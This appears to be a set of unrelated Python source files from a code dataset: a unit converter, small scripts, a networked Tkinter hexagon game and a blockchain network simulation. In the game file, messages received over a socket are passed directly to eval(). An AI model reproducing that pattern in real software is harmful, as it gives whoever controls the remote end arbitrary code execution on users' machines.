    \n\n\"\"\".format(\n software=os.environ.get('SERVER_SOFTWARE', default),\n script=os.environ.get('SCRIPT_NAME', default),\n month=this_day.strftime(\"%B\"),\n date=this_day.day,\n year=this_day.year,\n client_ip=os.environ.get('REMOTE_ADDR')\n)\nprint(body)\n","sub_path":"cgi-bin/cgi_2.py","file_name":"cgi_2.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"614951023","text":"import numpy as np\n\n\nif __name__ == \"__main__\":\n X = np.array([[1, 2, 3], [5, 2, 1], [8, 3, 1], [5, 2, 1]])\n\n match = [5, 2, 1]\n\n\n a = [x for x in a if x != [1,1]]\n\n \n # print(X.shape)\n # exit()\n\n # # Get sum squares err\n # X_hat = np.sum(np.mean(X_test)) / n_samples\n # # X_means = [np.mean(x_mat) for x_mat in X_test]\n # reconstruct_X_test = model.inverse_transform(W_test)\n\n # SS_err = np.sum(X_test - reconstruct_X_test)**2\n # SS_tot = np.sum(X_test - X_hat)**2\n\n # fuv = SS_err / SS_tot\n # print(fuv)\n\n # test_error = _beta_divergence(X_test, W_test, model.components_, 'frobenius', square_root=False)\n # k_error_dict[i].append(test_error)\n\n # print(\"rep: \", rep, \" k: \", i, \"mean test error: \", np.mean(k_error_dict[i]))\n","sub_path":"data_analysis_notebook/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"477585878","text":"'''\nCreated on Oct 19, 2011\n\n@author: steger, jozsef\n@organization: ELTE\n@contact: steger@complex.elte.hu\n'''\nfrom DataError import UnitError\n\nclass UnitManager(object):\n '''\n @summary: the unit container\n \n @note: The relationship between various unit, describing the derivation paths are not stored in this model,\n because this information can be inferred from the dimension derivations, represented in the L{DimensionManager}.\n @note: Units that are formed by prepending a unit prefix (L{Prefix}) are dealt as a L{DerivedUnit}.\n \n @ivar units: container of known units\n @type units: dict(str: L{Unit})\n @ivar conversionpaths: is a map of operations to carry out from a unit to get a different unit\n @type conversionpaths: dict((L{Unit}, L{Unit}): (callable, args))\n @ivar basins: indicates the derivatives of a basic unit\n @type basins: dict(L{BasicUnit}: set(L{Unit}))\n @ivar duplicatesymbols: collection of unit symbols, which more than one unit may bare\n @type duplicatesymbols: set(str)\n '''\n\n class Unit(object):\n '''\n @summary: common skeleton of all units\n @ivar manager: reference to the unit manager\n @type manager: L{UnitManager}\n @ivar reference: unique reference of the unit\n @ivar symbol: short form of the unit\n @type symbol: str\n '''\n def __init__(self, manager, reference, symbol, ancestor):\n '''\n @summary: bind and store common information of the unit\n @param manager: the unit manager\n @type manager: L{UnitManager}\n @param reference: a unique identifier\n @param symbol: short human readable representation of the unit\n @type symbol: str\n @param ancestor: the ancestor of this unit is deriving from\n @type ancestor: L{Unit}\n '''\n self._data = (manager, reference, symbol)\n self._ancestor = ancestor\n @property\n def manager(self):\n return self._data[0]\n @property\n def reference(self):\n return self._data[1]\n @property\n def symbol(self):\n return self._data[2]\n def __str__(self):\n return self.symbol\n def __eq__(self, u):\n return self._data == u._data\n\n class BasicUnit(Unit):\n '''\n @summary: a unit axiom\n '''\n def __init__(self, manager, reference, symbol):\n '''\n @summary: constructor\n A BasicUnit is an instance of either set of BaseUnit, ProductUnit and PowerUnit as of the information model.\n @param manager: a reference to the unit manager\n @type manager: L{UnitManager} \n @param reference: the reference to the unit\n @param symbol: an abbreviation for the unit\n @type symbol: str\n '''\n UnitManager.Unit.__init__(self, manager, reference, symbol, None)\n \n class DerivedUnit(Unit):\n '''\n @summary: a unit deriving from various known units\n '''\n def __init__(self, manager, reference, symbol, ancestor):\n '''\n @summary: constructor\n A DerivedUnit is an instance of either set of LinearTransformedUnit and RegexpScaledUnit as of the information model.\n Also units that have any unit prefix fall in this set.\n @param manager: a reference to the unit manager\n @type manager: L{UnitManager} \n @param reference: the reference to the unit\n @param symbol: an abbreviation for the unit\n @type symbol: str\n @param ancestor: the neighbor unit, whose derivative this instance is.\n @type ancestor: L{Unit}\n '''\n UnitManager.Unit.__init__(self, manager, reference, symbol, ancestor)\n \n \n def __init__(self):\n '''\n @summary: constructor\n '''\n self.units = {}\n self.conversionpaths = {}\n self.basins = {}\n self.duplicatesymbols = set()\n \n def __contains__(self, item):\n '''\n @summary: check the existence of a unit\n @param item: a unit or its symbol\n @type item: L{Unit} or str\n @return: True if the unit is known by the L{UnitManager}\n @rtype: bool\n @raise L{UnitError}: Wrong item type\n '''\n units = set(self.units.values())\n if isinstance(item, self.Unit):\n return item in units\n elif isinstance(item, str):\n for unit in units:\n if unit.symbol == item:\n return True\n return False\n else:\n raise UnitError(\"Wrong item type %s\" % item)\n \n def __len__(self):\n '''\n @summary: the number of units known by the L{UnitManager}\n @return: the number of units known by the L{UnitManager}\n @rtype: int\n '''\n return len(self.units)\n\n @staticmethod\n def intORfloat(x):\n '''\n @summary: a conversion helper to read out a value as a number\n @param x: a number\n @type x: str\n @return: the number converted to integer or floating point decimal\n @rtype: int or float\n '''\n if isinstance(x, str):\n try:\n return int(x)\n except ValueError:\n return float(x)\n else:\n return float(x)\n\n def __getitem__(self, reference):\n '''\n @summary: look up the unit in the L{UnitManager} using its reference\n @param reference: the reference to the unit\n @return: the unit found\n @rtype: L{Unit}\n @raise L{UnitError}: Unit with reference not found\n '''\n if self.units.has_key(reference):\n return self.units[reference]\n raise UnitError(\"Unit with reference %s not found\" % reference)\n\n def newBasicUnit(self, reference, symbol):\n '''\n @summary: generate a new basic unit\n @param reference: the reference to the unit\n @param symbol: a short form of the unit\n @type symbol: str\n @return: the new unit\n @rtype: L{BasicUnit}\n @raise L{UnitError}: Unit with reference exists\n '''\n if self.units.has_key(reference): \n raise UnitError(\"Unit with reference %s exists\" % reference)\n if UnitManager.__contains__(self, symbol):\n self.duplicatesymbols.add(symbol)\n unit = self.BasicUnit(self, reference, symbol)\n self.units[reference] = unit\n self.basins[unit] = set([unit])\n self.__dict__[reference] = unit\n return unit\n\n def addLinearTransformedUnit(self, reference, symbol, derivedfrom, scale, offset = 0):\n '''\n @summary: generate a derived unit\n @param reference: the reference to the unit\n @param symbol: a short form of the unit\n @type symbol: str\n @param derivedfrom: the neighbor unit\n @type derivedfrom: L{Unit}\n @param scale: scaling factor for the linear transformation\n @type scale: float\n @param offset: the shift in the linear transformation, defaults to 0\n @type offset: float \n @return: the new unit\n @rtype: L{DerivedUnit}\n @raise L{UnitError}: Wrong type of derivedfrom / Unit not found / Unit with reference exists / Cannot extend basin with unit, because Unit not found\n '''\n if not isinstance(derivedfrom, self.Unit):\n raise UnitError(\"Wrong type of derivedfrom %s\" % derivedfrom)\n if not UnitManager.__contains__(self, str(derivedfrom)):\n raise UnitError(\"Unit %s not found\" % derivedfrom)\n if self.units.has_key(reference): \n raise UnitError(\"Unit with reference %s exists\" % reference)\n unit = self.DerivedUnit(self, reference, symbol, derivedfrom)\n basic = derivedfrom\n while basic._ancestor:\n basic = basic._ancestor\n if not self.basins.has_key(basic):\n raise UnitError(\"Cannot extend basin with unit %s, because Unit %s not found\" % (unit, basic))\n if UnitManager.__contains__(self, symbol):\n self.duplicatesymbols.add(symbol)\n self.units[reference] = unit\n self.conversionpaths[(unit, derivedfrom)] = (self.op_lt_forward, (scale, offset))\n self.conversionpaths[(derivedfrom, unit)] = (self.op_lt_inverse, (scale, offset))\n self.basins[basic].add(unit)\n self.__dict__[reference] = unit\n return unit\n\n def addRegexpTransformedUnit(self, reference, symbol, derivedfrom, expr_forward, expr_inverse):\n '''\n @summary: generate a derived unit\n @param reference: the reference to the unit\n @param symbol: a short form of the unit\n @type symbol: str\n @param derivedfrom: the neighbor unit\n @type derivedfrom: L{Unit}\n @param expr_forward: the expression driving the forward transformation\n @type expr_forward: str\n @param expr_inverse: the expression driving the inverse transformation\n @type expr_inverse: str\n @return: the new unit\n @rtype: L{DerivedUnit}\n @raise L{UnitError}: Wrong type of derivedfrom / Unit not found / Unit with reference exists / Cannot extend basin with unit, because Unit not found\n '''\n if not isinstance(derivedfrom, self.Unit):\n raise UnitError(\"Wrong type of derivedfrom %s\" % derivedfrom)\n if not UnitManager.__contains__(self, str(derivedfrom)):\n raise UnitError(\"Unit %s not found\" % derivedfrom)\n if self.units.has_key(reference): \n raise UnitError(\"Unit with reference %s exists\" % reference)\n unit = self.DerivedUnit(self, reference, symbol, derivedfrom)\n basic = derivedfrom\n while basic._ancestor:\n basic = basic._ancestor\n if not self.basins.has_key(basic):\n raise UnitError(\"Cannot extend basin with unit %s, because Unit %s not found\" % (unit, basic))\n if UnitManager.__contains__(self, symbol):\n self.duplicatesymbols.add(symbol)\n self.units[reference] = unit\n self.conversionpaths[(unit, derivedfrom)] = (self.op_rt_forward, expr_forward)\n self.conversionpaths[(derivedfrom, unit)] = (self.op_rt_inverse, expr_inverse)\n self.basins[basic].add(unit)\n self.__dict__[reference] = unit\n return unit\n\n def getBasinByUnit(self, unit):\n '''\n @summary: return the set of units, which are compatible with a given unit\n @param unit: the unit to look up\n @type unit: L{Unit}\n @return: the set of compatible units\n @rtype: set(L{Unit})\n @raise L{UnitError}: not found\n '''\n for basin in self.basins.values():\n if unit in basin:\n return basin\n raise UnitError(\"Basin for unit %s not found\" % unit)\n\n def getBasinByReference(self, reference):\n '''\n @summary: look up the compatible units of a given unit with the calling reference\n @param reference:\n @return: the set of compatible units\n @rtype: set(L{Unit})\n @raise L{UnitError}: not found\n '''\n try:\n unit = self[reference]\n return self.getBasinByUnit(unit)\n except UnitError:\n raise UnitError(\"Basin for unit reference %s not found\" % reference)\n\n def op_lt_forward(self, value, so):\n (scale, offset) = so\n def op(value):\n return scale * self.intORfloat( value ) + offset\n if isinstance(value, list):\n return map(lambda x: op(x), value)\n return op(value)\n\n def op_lt_inverse(self, value, so):\n (scale, offset) = so\n def op(value):\n return (self.intORfloat( value ) - offset) / float(scale)\n if isinstance(value, list):\n return map(lambda x: op(x), value)\n return op(value)\n\n def op_rt_forward(self, value, expression):\n def op(value):\n raise UnitError(\"not implemented\")\n if isinstance(value, list):\n return map(lambda x: op(x), value)\n return op(value)\n\n op_rt_inverse = op_rt_forward\n\n def convert(self, value, from_unit, to_unit):\n '''\n @summary: convert a value of one unit to the other\n @param value: input value in from_unit\n @param from_unit: the original unit of the input value\n @type from_unit: L{Unit}\n @param to_unit: the requested new unit\n @type to_unit: L{Unit}\n @raise L{UnitError}: unknown unit / incompatible units\n '''\n if not UnitManager.__contains__(self, str(from_unit)):\n raise UnitError(\"Unknown from_unit\")\n if not UnitManager.__contains__(self, str(to_unit)):\n raise UnitError(\"Unknown to_unit\")\n if from_unit == to_unit:\n return value\n\n while from_unit._ancestor:\n op, oparg = self.conversionpaths[(from_unit, from_unit._ancestor)]\n value = op(value, oparg)\n from_unit = from_unit._ancestor\n heap = []\n while to_unit._ancestor:\n op, oparg = self.conversionpaths[(to_unit._ancestor, to_unit)]\n heap.append((op, oparg))\n to_unit = to_unit._ancestor\n if from_unit != to_unit:\n raise UnitError(\"Different base units %s %s\" % (from_unit, to_unit))\n while len(heap):\n op, oparg = heap.pop(0)\n value = op(value, oparg)\n return value\n\n","sub_path":"Monitoring/MonitoringService/DataProcessing/Unit.py","file_name":"Unit.py","file_ext":"py","file_size_in_byte":13571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"211806979","text":"#! /usr/bin/env python\n\nT = int(input())\n\nfor t in range(1, T+1):\n n, s = input().split()\n n = int(n)\n ss = [ord(x) - ord('0') for x in s]\n need = 0\n now = 0\n for i, x in enumerate(ss):\n if now < i:\n need += i - now\n now = i\n now += x\n\n print(\"Case #{}: {}\".format(t, need))\n \n","sub_path":"solutions_5639104758808576_0/Python/LeoMao/pa.py","file_name":"pa.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"292755740","text":"import csv\nimport ConfigParser\nimport glob, os\n\t\nconfig = ConfigParser.RawConfigParser()\n\t\ntry: \n\tproperties = config.read('config.ini')\n\trows = int(config.get('CONFIGURATION', 'number_of_rows').strip('\"'))\n\tposition = int(config.get('CONFIGURATION', 'position_to_be_corrected').strip('\"'))\n\tdelimiter = config.get('CONFIGURATION', 'delimiter').strip('\"')\n\tsubstitute = config.get('CONFIGURATION', 'substitute').strip('\"')\n\nexcept (ConfigParser.NoSectionError, ConfigParser.NoOptionError):\n\trows = 20\n\tposition = 5\n\tdelimiter = ';'\n\tsubstitute = ''\n\nos.chdir(\"files/\")\nfor f in glob.glob(\"*.csv\"):\n\tif \"modified\" not in f:\n\t\tinput = open(f, 'rb')\n\t\tfile = csv.reader(input, delimiter=delimiter)\n\t\t\n\t\ttext = []\n\t\tfor row in file:\t\n\t\t\tnew_row = []\n\t\t\t\n\t\t\tif(len(row) > rows):\n\t\t\t\t\n\t\t\t\tdifference = len(row) - rows;\n\t\t\t\tnew_row = row[0:position-1]\n\t\t\t\tdescription = row[position-1:position+difference]\n\t\t\t\tdescription = substitute.join(description)\n\t\t\t\tnew_row.append(description)\n\t\t\t\tnew_row.extend(row[position+difference:])\n\t\t\t\ttext.append(new_row)\n\t\t\telse:\n\t\t\t\ttext.append(row)\n\n\t\twith open(os.path.splitext(os.path.basename(f))[0] + '_modified.csv', 'wb') as output:\n\t\t\tdestination = csv.writer(output, delimiter=';')\n\t\t\tdestination.writerows(text)\n\t\t\t\n\t\tinput.close()\n\t\toutput.close()","sub_path":"CSVCorrectorBETA.py","file_name":"CSVCorrectorBETA.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"398932856","text":"# =============================================================================\n'''\nQuick description of the file\n'''\n# =============================================================================\n__author__ = 'Simon Lassourreuille & Loizel Antoine'\n__version__ = ''\n__date__ = '26/01/2017'\n__email__ = 'simon.lassourreuille@etu.u-bordeaux.fr & antoine.loizel@etu.u-bordeaux.fr'\n__status__ = 'TD'\n# =============================================================================\nimport socket\nimport threading\nimport tkinter as tk\nfrom cmath import rect\nfrom math import pi, cos, sqrt\n\nfrom PIL import Image, ImageTk\n\nimport network\nfrom Main import *\n\n\n# =============================================================================\ndef load_image(path, resize=None):\n image = Image.open(path)\n if resize:\n image.thumbnail(resize, Image.ANTIALIAS)\n return ImageTk.PhotoImage(image)\n\n# =============================================================================\nclass Game(tk.Tk):\n def __init__(self, p = Plateau(5, 7), online=True):\n # Init of tk window\n tk.Tk.__init__(self)\n self.title(\"You Lost The Game\")\n\n # Attributes\n self.p = p\n self.width = 40\n self.player = 0\n self.__hexagons = {}\n self.__images = {}\n self.__tokens = []\n self.__victory = []\n self.finished = False\n\n # Init of tk canvas\n self.canvas = Workspace(self, p.hauteur, self.width)\n self.canvas.pack(expand=True, fill='both')\n self.canvas['height'] = self.p.hauteur * self.width * 1.7\n self.canvas['width'] = (2 * self.p.largeur + self.p.hauteur // 2) * 1.08 * self.width\n\n # Images init\n size = (self.width*2,self.width*2)\n for i in range(3):\n if i > 0:\n self.__images[i, '_'] = load_image(\"Sprites/Hexagon {} _.png\".format(i), size)\n if i < 2:\n self.__tokens.append(load_image(\"Sprites/Token {}.png\".format(i),(self.width,self.width)))\n self.__victory.append(load_image(\"Sprites/Victory {}.png\".format(i+1)))\n self.__images[i] = load_image(\"Sprites/Hexagon {}.png\".format(i), size)\n\n # Bindings\n self.bind('', self.on_click)\n self.bind('', self.test)\n self.bind('', self.replay)\n self.protocol(\"WM_DELETE_WINDOW\", self.on_closing)\n\n # Networking\n if online:\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n # self.socket.connect(('192.168.173.1', network.PORT))\n self.socket.connect(('127.0.0.1', network.PORT))\n print(\" Connected to the server \".center(80, \"=\"))\n thread = threading.Thread(target=self.server_input, daemon=True)\n thread.start()\n self.token = 0\n\n print(\"=\" * 30 + \" Game Started \" + \"=\" * 30)\n self.reset()\n self.display()\n self.mainloop()\n\n # -------------------------------------------------------------------------\n def server_input(self):\n rest = bytes()\n while True:\n try:\n # blocks\n (msgs, rest) = network.recv_msgs(self.socket, rest)\n for msg in msgs:\n self.handle_requests(msg)\n except ConnectionError:\n print('Connection to server closed')\n self.socket.close()\n break\n\n # -------------------------------------------------------------------------\n def handle_requests(self, request):\n print(\"received request : \", request)\n eval(request)\n\n # -------------------------------------------------------------------------\n def reset(self):\n # Reset the Plateau\n self.finished = False\n self.p = Plateau(self.p.largeur, self.p.hauteur)\n self.p[0].valeur = NOIR\n self.p[-1].valeur = NOIR\n self.p[0, self.p.largeur - 1].valeur = BLANC\n self.p[self.p.hauteur - 1, 0].valeur = BLANC\n self.token = 0\n self.display()\n self.random()\n\n # -------------------------------------------------------------------------\n def check_victory(self):\n if (not self.p.jouables(NOIR)) or (not self.p.jouables(BLANC)):\n if self.p.jouables(NOIR):\n self.p.jouables(NOIR)[0].valeur = NOIR\n elif self.p.jouables(BLANC):\n self.p.jouables(BLANC)[0].valeur = BLANC\n self.display()\n if len(self.p.libres) > 0:\n self.after(1750, self.check_victory)\n else :\n self.on_game_end()\n\n # -------------------------------------------------------------------------\n def on_game_end(self):\n self.finished = True\n scores = [len(list(filter(lambda x: x.valeur == color, self.p.configuration))) for color in (BLANC, NOIR)]\n winner = 0 if scores[0] > scores[1] else 1\n self.canvas.create_image(self.winfo_width() * 0.5, self.winfo_height() * 0.5, image=self.__victory[winner])\n\n # -------------------------------------------------------------------------\n def replay(self, unused_ev):\n if self.finished:\n network.send_msg(self.socket, \"replay\")\n\n # ------------------------------------------------------------------------\n def random(self):\n if self.token == self.player and self.p.jouables([BLANC,NOIR][self.player]):\n cell = self.select(self.p.jouables([BLANC,NOIR][self.player]))\n i,j = self.p.pos2coord(cell.position)\n network.send_msg(self.socket, \"click {} {}\".format(i, j))\n self.check_victory()\n self.after(75, self.random)\n\n def select(self, jouables):\n color = [NOIR, BLANC][self.player]\n best_cell, score = None, -1\n for cell in jouables:\n if cell.force(color) >= score:\n score = cell.force(color)\n best_cell = cell\n return best_cell\n\n # ------------------------------------------------------------------------\n def on_closing(self):\n # Some code\n print(\"\\n\" + \"=\" * 31 + \" Game Ended \" + \"=\" * 31)\n self.destroy()\n\n # -------------------------------------------------------------------------\n def __getitem__(self, item):\n return self.__hexagons.__getitem__(item)\n\n # -------------------------------------------------------------------------\n def __setitem__(self, key, value):\n self.__hexagons.__setitem__(key, value)\n\n # -------------------------------------------------------------------------\n def play(self, i, j, color=None):\n color = [BLANC, NOIR][self.token] if color == None else color\n self.p[i, j].valeur = color\n for cell in self.p[i, j].voisins:\n if cell.valeur != VIDE and cell.valeur != color:\n cell.valeur = color\n self.display()\n self.check_victory()\n\n # -------------------------------------------------------------------------\n def test(self, ev):\n x = self.winfo_pointerx() - self.winfo_rootx()\n y = self.winfo_pointery() - self.winfo_rooty()\n for (i, j), hex in self.__hexagons.items():\n if hex.enter(x, y):\n pass\n\n # -------------------------------------------------------------------------\n def on_click(self, ev):\n print(\"Player :\", self.player, \"Token :\", self.token)\n for (i, j), hex in self.__hexagons.items():\n if hex.enter(ev.x, ev.y) and self.p[i, j].estAccessible([BLANC,NOIR][self.player]):\n network.send_msg(self.socket, \"click {} {}\".format(i, j))\n\n # -------------------------------------------------------------------------\n def display(self):\n self.canvas.delete(\"all\")\n\n self.canvas.create_image(self.width/2, self.width/1.8, image=self.__tokens[self.token])\n for x in self.p.configuration:\n i,j = self.p.pos2coord(x.position)\n p = self.canvas.coord2pixels((i, j),\n origin=((self.p.hauteur // 2) * 2 * self.width) * 1J + self.width)\n self[i, j] = Hexagon(self.width, int(p.real), int(p.imag))\n index = {VIDE: 0, BLANC: 1, NOIR: 2}[self.p[i, j].valeur]\n image = self.__images[index]\n self.canvas.create_image(p.real, p.imag, image=image, tags=(\"%s,%s\") % (i, j))\n # if True :\n # self.canvas.create_text(p.real, p.imag, text = str((i,j)))\n\n# =============================================================================\ndef create_complex(create):\n \" Décorateur pour permettre l'utilisation de complexes comme coordonnées \"\n def decorator(*args, **kwargs):\n newargs = []\n for element in args:\n if type(element) is complex:\n newargs += [element.real] + [element.imag]\n else:\n newargs.append(element)\n create(*newargs, **kwargs)\n\n return decorator\n# =============================================================================\n\nclass Workspace(tk.Canvas):\n def __init__(self, master, h, w, *args, **kwargs):\n tk.Canvas.__init__(self, master, *args, bg='#FFFFFF', **kwargs)\n self.create_polygon = create_complex(self.create_polygon)\n self.create_line = create_complex(self.create_line)\n self.board_height = h\n self.hexagon_width = w\n\n # -------------------------------------------------------------------------\n @create_complex\n def create_hexagon(self, width, x, y=None, angle = pi / 6):\n if y is None: x, y = x.real, x.imag\n points = []\n for i in range(6):\n points.append(x + y * 1j + rect(width, angle + i * (pi / 3)))\n self.create_polygon(*points, fill='white', outline='black')\n\n # -------------------------------------------------------------------------\n def coord2pixels(self, coords, origin = 50 + 200 * 1J):\n v = [rect(self.hexagon_width, pi / 6 + i * (pi / 3)) for i in range(6)]\n k = v[-1] + v[-2] if (coords[0] - self.board_height // 2) <= 0 else v[0] + v[1]\n return origin + coords[1] * (v[0] + v[-1]) + abs(coords[0] - self.board_height // 2) * k\n # -------------------------------------------------------------------------\n\n# =============================================================================\nclass Hexagon(object):\n id = 0\n\n def __init__(self, width, x, y, tag = ''):\n \"\"\" Stocke les coordonnées et dimensions d'un Hexagone\"\"\"\n self.tag = tag if tag else str(Hexagon.id)\n Hexagon.id += 1\n self.width = width\n self.x, self.y = x, y\n\n # -------------------------------------------------------------------------\n def enter(self, x, y):\n p = abs(self.x - x) + abs(self.y - y) * 1j\n if sqrt(p.real ** 2 + p.imag ** 2) > self.width:\n return False\n # |- - _ _\n # | - - _ _\n # | triangle - - _ _\n # | - - _ _\n # | |\n # | |\n # | Rectangle | height\n # | |\n # | ___________width_____________ |\n width = self.width * cos(pi / 6)\n height = sqrt(self.width ** 2 - width ** 2)\n # First : rectangle check\n if p.real < width and p.imag < height:\n return True\n # Second : triangle check\n p0 = 0 + height * 1j\n p1 = width + height * 1j\n p2 = 0 + self.width * 1j\n Area = 0.5 * (-p1.imag * p2.real + p0.imag * (-p1.real + p2.real)\n + p0.real * (p1.imag - p2.imag) + p1.real * p2.imag)\n s = 1 / (2 * Area) * (p0.imag * p2.real - p0.real * p2.imag +\n (p2.imag - p0.imag) * p.real + (p0.real - p2.real) * p.imag)\n t = 1 / (2 * Area) * (p0.real * p1.imag - p0.imag * p1.real +\n (p0.imag - p1.imag) * p.real + (p1.real - p0.real) * p.imag)\n\n if s > 0 and t > 0 and 1 - s - t > 0:\n return True\n return False\n # -------------------------------------------------------------------------\n\n\nif __name__ == '__main__':\n game = Game()\n","sub_path":"Random.py","file_name":"Random.py","file_ext":"py","file_size_in_byte":12214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"377269458","text":"from PIL import Image\nimport tensorflow as tf\nimport numpy as np\nimport glob\n\nflags = tf.app.flags\nflags.DEFINE_string('img_dir', '/home/plantvillage/Dropbox/Object_Detection/warehouse/Cassava/images/cassava_dashboard/cassava_capture/unsorted_images_backup', 'Path to the directory of images')\nFLAGS = flags.FLAGS\n\n\nimg_dir = FLAGS.img_dir\ni = 0\nj = 0\n# Read in images using Pillow\nfor img_path in glob.glob(img_dir + '*'):\n j+=1\n for second_img_path in glob.glob(img_dir + '*'):\n if img_path != second_img_path:\n if i % 100 == 0:\n print('Inside loop: %d\\tOutside loop: %d' % (i, j))\n i+=1\n image = Image.open(img_path)\n comp_image = Image.open(second_img_path)\n\n (comp_img_width, comp_img_height) = comp_image.size\n comp_image_np = np.array(comp_image.getdata()).reshape(\n (comp_img_width, comp_img_height, 3)).astype(np.uint8)\n\n # Convert image into numpy array\n (im_width, im_height) = image.size\n image_np = np.array(image.getdata()).reshape(\n (im_height, im_width, 3)).astype(np.uint8)\n\n # Look at all columns and all channels of a single row\n row = 0\n comp_row = comp_image_np[row,:,:]\n og_row = image_np[row, :, :]\n\n if np.array_equal(og_row, comp_row):\n print('Found Duplicate!!')\n print('First image:' + img_path)\n print('Second image:' + second_img_path)","sub_path":"tools/check_exact_duplicates.py","file_name":"check_exact_duplicates.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"194863608","text":"import time\nfrom typing import Set, Optional, Sequence, Tuple, Dict\nfrom dataclasses import dataclass, field\n\nfrom model.specs import (\n VALIDATOR_REGISTRY_LIMIT,\n ValidatorIndex, Slot,\n BeaconState, Attestation, SignedBeaconBlock,\n)\nfrom model.validatorlib import (\n BRValidator, SyncCommitteeBundle\n)\n\nfrom eth2spec.utils.ssz.ssz_typing import Container, List, uint64\n\nlog = False # set to True to receive an avalanche of messages\n\nclass NetworkSetIndex(uint64):\n pass\n\n@dataclass\nclass NetworkSet(object):\n validators: List[ValidatorIndex, VALIDATOR_REGISTRY_LIMIT]\n\n@dataclass\nclass NetworkAttestation(object):\n item: Attestation\n info_sets: List[NetworkSetIndex, VALIDATOR_REGISTRY_LIMIT]\n\n@dataclass\nclass NetworkSyncCommittee(object):\n item: SyncCommitteeBundle\n info_sets: List[NetworkSetIndex, VALIDATOR_REGISTRY_LIMIT]\n\n@dataclass\nclass NetworkBlock(object):\n item: SignedBeaconBlock\n info_sets: List[NetworkSetIndex, VALIDATOR_REGISTRY_LIMIT]\n\n@dataclass\nclass Network(object):\n validators: List[BRValidator, VALIDATOR_REGISTRY_LIMIT]\n sets: List[NetworkSet, VALIDATOR_REGISTRY_LIMIT]\n\n # In a previous implementation, we kept attestations and blocks in the same queue.\n # This was unwieldy. We can extend this easily by adding `Attester/ProposerSlashing`s\n attestations: List[NetworkAttestation, VALIDATOR_REGISTRY_LIMIT] = field(default_factory=list)\n sync_committees: List[SyncCommitteeBundle, VALIDATOR_REGISTRY_LIMIT] = field(default_factory=list)\n blocks: List[NetworkBlock, VALIDATOR_REGISTRY_LIMIT] = field(default_factory=list)\n\n # We have the possibility of malicious validators refusing to propagate messages.\n # Unused so far and untested too.\n malicious: List[ValidatorIndex, VALIDATOR_REGISTRY_LIMIT] = field(default_factory=list)\n\ndef get_all_sets_for_validator(network: Network, validator_index: ValidatorIndex) -> Sequence[NetworkSetIndex]:\n # Return indices of sets to which the validator belongs\n\n return [i for i, s in enumerate(network.sets) if validator_index in s.validators]\n\ndef get_all_sets_for_validators(\n network: Network,\n validator_indices: Sequence[ValidatorIndex]\n) -> Sequence[NetworkSetIndex]:\n # Return indices of sets to which validators in `validator_indices` belong\n\n return [i for i, s in enumerate(network.sets) if len(set(s.validators) & set(validator_indices)) > 0]\n\ndef items_known_by_sets(network: Network, info_sets: Sequence[NetworkSetIndex]) -> Dict[str, Sequence[Container]]:\n # Known network items of network sets `info_sets`\n\n known_attestations = [item for item in network.attestations if len(set(item.info_sets) & info_sets) > 0]\n known_sync_committees = [item for item in network.sync_committees if len(set(item.info_sets) & info_sets) > 0]\n known_blocks = [item for item in network.blocks if len(set(item.info_sets) & info_sets) > 0]\n return {\n \"attestations\": known_attestations,\n \"sync_committees\": known_sync_committees,\n \"blocks\": known_blocks,\n }\n\ndef knowledge_set(network: Network, validator_index: ValidatorIndex) -> Dict[str, Sequence[Container]]:\n # Known network items of validator `validator_index`\n\n info_sets = set(get_all_sets_for_validator(network, validator_index))\n return items_known_by_sets(network, info_sets)\n\ndef knowledge_set_union(\n network: Network,\n validator_indices: Sequence[ValidatorIndex]\n) -> Dict[str, Sequence[Container]]:\n # Known network items of validators in `validator_indices`\n\n info_sets = set(get_all_sets_for_validators(network, validator_indices))\n return items_known_by_sets(network, info_sets)\n\ndef ask_to_check_backlog(network: Network,\n validator_indices: Set[ValidatorIndex]) -> None:\n # Called right after a message (block or attestation) was sent to `validator_indices`\n # Asks validators to check if they can e.g., definitely include attestations in their\n # latest messages or record blocks.\n for validator_index in validator_indices:\n validator = network.validators[validator_index]\n\n # Check if there are pending attestations/blocks that can be recorded\n known_items = knowledge_set(network, validator_index)\n validator.check_backlog(known_items)\n\ndef disseminate_attestations(network: Network, items: Sequence[Tuple[ValidatorIndex, Attestation]]) -> None:\n # We get a set of attestations and disseminate them over the network\n\n # Finding out who receives a new attestation\n broadcast_validators = set()\n for item in items:\n sender = item[0]\n attestation = item[1]\n broadcast_list = get_all_sets_for_validator(network, sender)\n\n # The sender records that they have sent an attestation\n network.validators[sender].log_attestation(attestation)\n\n # Adding the attestation to network items\n networkItem = NetworkAttestation(item=attestation, info_sets=broadcast_list)\n network.attestations.append(networkItem)\n\n # Update list of validators who received a new item\n for info_set_index in broadcast_list:\n broadcast_validators |= set(network.sets[info_set_index].validators)\n\n ask_to_check_backlog(network, broadcast_validators)\n\ndef disseminate_sync_committees(network: Network, items: Sequence[Tuple[ValidatorIndex, SyncCommitteeBundle]]) -> None:\n # We get a set of sync committees and disseminate them over the network\n\n # Finding out who receives a new attestation\n broadcast_validators = set()\n for item in items:\n sender = item[0]\n sc_bundle = item[1]\n broadcast_list = get_all_sets_for_validator(network, sender)\n\n # The sender records that they have sent an attestation\n network.validators[sender].log_sync_committee(sc_bundle)\n\n # Adding the attestation to network items\n networkItem = NetworkSyncCommittee(item=sc_bundle, info_sets=broadcast_list)\n network.sync_committees.append(networkItem)\n\n # Update list of validators who received a new item\n for info_set_index in broadcast_list:\n broadcast_validators |= set(network.sets[info_set_index].validators)\n\n ask_to_check_backlog(network, broadcast_validators)\n\ndef disseminate_block(network: Network,\n sender: ValidatorIndex,\n item: SignedBeaconBlock,\n to_sets: List[NetworkSetIndex, VALIDATOR_REGISTRY_LIMIT] = None) -> None:\n # 